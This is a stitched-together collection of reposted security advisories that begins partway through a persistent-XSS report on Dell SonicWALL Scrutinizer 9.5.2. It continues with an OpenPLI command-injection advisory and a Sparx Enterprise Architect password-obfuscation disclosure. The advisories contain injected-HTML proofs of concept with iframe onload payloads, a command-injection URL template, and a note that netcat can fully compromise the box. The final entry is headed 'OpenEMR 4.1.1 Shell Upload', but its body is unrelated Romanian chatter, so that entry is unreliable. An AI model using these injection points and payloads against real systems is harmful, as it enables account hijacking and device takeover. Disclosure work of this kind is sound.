to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance application.


Report-Timeline:
================
2012-12-05:  Researcher Notification & Coordination
2012-12-07:  Vendor Notification
2013-01-08:  Vendor Response/Feedback
2013-02-10:  Vendor Fix/Patch
2013-02-11:  Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
Multiple persistent input validation vulnerabilities are detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bugs allows remote attackers to implement/inject malicious script code on the application side (persistent).

The first persistent vulnerability is located in the Alarm - New Board & Policy Manager module with the bound vulnerable 
Search item - BBSearchText parameter request. The vulnerability allows to inject persistent script code as search item value.
The result is the persistent execution of script code out of the BBSearchText listing.

The secound persistent vulnerability is located in the Dashboard - Flow Expert module with the bound vulnerable Mytab parameter.
The vulnerability allows to inject persistent script code as myTab link value. The result is the persistent execution of script 
code out of the Mytab link listing.

The 3rd persistent vulnerability is located in the MyView (CGI) module with the bound vulnerable `newName` parameter request.
The vulnerability allows to inject persistent script code as newName. The result is the persistent execution of script code 
out of the core value listing.

The 4th persistent vulnerability is located in the Admin > Admin [New Users & New Group] module with the bound vulnerable 
groupName & username parameters. The vulnerability allows to inject persistent script code as username or groupname. The result 
is the persistent execution of script code out of all username and group listings + checkboxes.

The 5th persistent vulnerability is located in the Admin > Admin [Mapping / Maps (CGI) - Dashboard Status] module with the bound 
vulnerable groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) parameters. 
The vulnerability allows to inject persistent script code as groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name 
& settings groups(checkbox) value(s). The result is the persistent execution of script code out of the groupMembers, Type, Checkbox 
Linklike, indexColumn, name, Object Name listings and settings groups checkbox.

The 6th persistent vulnerability is located in the Alarms > Overview Bulletin Board > Advanced Filters module with the bound vulnerable 
displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) parameters. The vulnerability allows to inject persistent script code 
as Policy Name, Board Name and Violator. The result is the persistent execution of script code out of the Policy Name, Board Name and 
Violator listings.

Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent 
external redirects to malware or scam and persistent web context manipulation in the affected vulnerable module(s). Exploitation requires 
low user interaction & a low privileged appliance web application user account.

Vulnerable Section(s):
      [+] Alarm
      [+] Dashboard
      [+] MyView (CGI)
      [+] Admin > Admin
      [+] Admin > Admin 
      [+] Alarms

Vulnerable Module(s):
      [+] New Board & Policy Manager
      [+] Flow Expert
      [+] Value
      [+] New Users & New Group
      [+] Mapping / Maps (CGI) - Dashboard Status
      [+] Overview Bulletin Board > Advanced Filters

Vulnerable Parameter(s):
      [+] Search item - BBSearchText
      [+] Mytab
      [+] newName
      [+] groupName & username - Place in Usergroup - Listing
      [+] groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox)
      [+] displayBBAdvFilterModal() - (Policy Name, Board Name, Violators)


Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account 
and low required user interaction. For demonstration or reproduce ...


Review: Alarm > New Board & Policy Manager - [BBSearchText]  Search item

<td class="textRight agNoWrap">
<input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe>
<input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button">

<input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button">




Review: Dashboard > Flow Expert > Mytab - [Mytab Name]

<div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span>
<span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span>
<span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab">
<span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"><span tid="5" style="margin-left: 
10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; margin-right: 
10px;">Training</span></span><span class="myv_selectedtab"><span title="Click to rename" class="jedit" id="tab_7" 
origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span>
<img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab">
<span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div>



Review: MyView (CGI) > Value - [newName]

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"></head>
<body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]">    \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body>
</html>


Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing]

<div class="unfortunate" style="" id="settingsContent">

<div id="settingsHeader"></div>

<div id="settingsOutput">



<title>User Preferences</title>
<div id="mainFrame">


<div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu">
<a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;" class="genericAccordionContainer">
<p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username" 
type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password">
</label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;" 
id="up_availGroups"><option value="3"><iframe src="a">    "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option>
<option value="1">Administrators</option><option value="2">Guests</option></select></label>?????<input value="Create User" class="button" 
style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;" 
class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div>


Review: Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups]

<div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr">
<th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;" 
class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1">
<td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit 
this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a>
</td><td>Google</td><td><a title="Click to change object 
membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option>
<option value="1">Pass Up</option></select></td>
<td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno 
passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" 
type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div>
<div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option 
value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option>
<option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option>
<option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option>
<option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow">
<td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option>

...

<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr>?????<th style="white-space: nowrap;" nowrap="">Map</th>
<th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody>
<tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20">
<iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td>
?????<td class="" align="center">-</td></tr></tbody></table>

...

<tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20"> 
</th>?????<th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi 
highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit 
this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap="">
<span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object" 
class="linkLike">Membership</a>?????</td><td style="display: none;" class="indexColumn fmaps_bakTrHi 
highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody>

...

<td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;" 
id="fmaps_containerTitle" class="titleBar">?????<span style="float:left" ;="">Settings</span><img title="Map Settings Help" 
src="/images/common/help.png"><select id="fmaps_groupSelect">
<option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google)
</iframe></option></select></div>?????<div id="fmaps_confBodyContainer"><div id="defaultsContainer">


...

<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> ?????<img src="/images/common/gicon.png" 
gid="1" title="<iframe src=a>%20%20%20%20">?????<iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
<span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)" 
gid="1"><iframe src="a">%20%20%20...</span>

<ul style="display: none;">

<li>Loading...</li>
</ul>
</li>
<li class='expandable noWrapOver lastExpandable'> 
<div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span>
      <ul style="display: none;">
<li class="last"><span class=" ">No Devices</span></li>
</ul>
</li>
</ul>
</iframe></span></li>


Solution:
=========
2013-02-10:  Vendor Fix/Patch

Where changing code paths to use bound variables was not practical in such a short timeframe, we pass inputs included in a query through a function that escapes potentially dangerous characters.


Risk:
=====
The security risk of the persistent input validation web vulnerabilities are estimated as medium(+)|(-)high.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com             - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com   - support@vulnerability-lab.com          - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com   - forum.vulnerability-lab.com            - news.vulnerability-lab.com
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab          - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

                 Copyright © 2012 | Vulnerability Laboratory




-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm

[OpenPLI OS Command Execution / Cross Site Scripting]

OpenPLI Dream Multimedia Box suffers from cross site scripting and remote OS command injection vulnerabilities.

Device Name: OpenPLI - Dream Multimedia Box with OpenPLI software
Vendor of device: Dream Multimedia
Vendor of Software: OpenPLI Community

============ Device Details: ============ 

Linux Kernel  Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011
Firmware  release 1.1.0, 27.01.2013
FP Firmware  1.06
Web Interface  6.0.4-Expert - PLi edition by [lite]

More infos: http://openpli.org/

============ Vulnerability Overview: ============ 

* OS Command Execution:

  parameter: maxmtu

The vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device.

http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26&hddstandby=2&hddacoustics=160&timeroffsetstart=0&timeroffsetstop=0&audiochannelspriority=&showsatpos=on&trustedhosts=&epgcachepath=%2Fhdd&epgsqlpath=%2Fvar%2Flib%2Fsqlite

It is possible to shorten the URL to the following:

http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26

There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it but you will get it 

* stored XSS:

Box Control -> Configuration -> Webserver -> User, Password

  parameter: AuthUser, AuthPassword

Box Control -> Configuration -> Settings

  parameter: audiochannelspriority

Injecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

Source: PacketStorm

[Sparx Systems Enterprise Architect 9.3.931 Corporate Password Disclosure]

Sparx Systems Enterprise Architect version 9.3.931 stores user passwords in the database simply XORed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function.

Subject
=======
Simple password obfuscation in Sparx Systems "Enterprise Architect" when using server based repositories

Affected product
================
Product: Enterprise Architect
Vendor: Sparx Systems

Affected versions
=================
Tested with 9.3.931 Corporate, other versions likely to be affected too.

Description
===========
When using server based repositories in Enterprise Architect the user account information is stored in the database table t_secuser. The column "Password" contains the user password in an obfuscated format. The content is simply the user password XOR'ed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function. Hence everyone with access to the database (which is in general every user with access to the repository) is able to decode the passwords of all other users.

Impact
======
Disclosure of user passwords.

Possible mitigating factors
===========================
Beginning with version 7.1 Enterprise Architect offers a feature where project owners can provide users with a shortcut to the project that contains the database connection string in an encrypted format. This should avoid the need to reveal database access credentials to end users. 

Conclusion
==========
Everyone with access to the database containing the repository is able to decode the passwords of all users. Irrespective of the fact that ordinary end users may be detained from gaining access to the database using the "Encrypt Connection String" feature, at least SQL admins may still read the t_secuser table and are therefore able decode the passwords.

Chronology
==========
Vendor informed: 2012/01/28
Vendor reminded: 2012/02/06
Vender response: 2012/02/07

Summary of vendor response: 
- "We are aware of these limitations"
- "No fixes are scheduled at this time."

Released to public: 2012/02/12

Reported by
===========
Holm Diening
Dept. Privacy and Information Security

E-Mail: holm.diening@gematik.de
www.gematik.de

gematik
Gesellschaft für Telematikanwendungen der Gesundheitskarte mbH Friedrichstraße 136
10117 Berlin
Amtsgericht Berlin-Charlottenburg HRB 96351 B
Geschäftsführer: Prof. Dr. Arno Elmer

Source: PacketStorm

[OpenEMR 4.1.1 Shell Upload]

Asta a fost prea penala

Pretoriane prin packetstorm crezi ca imi poti gasi ceva pentru phpmelody?!

Ai destui 'priceputi', acum ca oferiti si servicii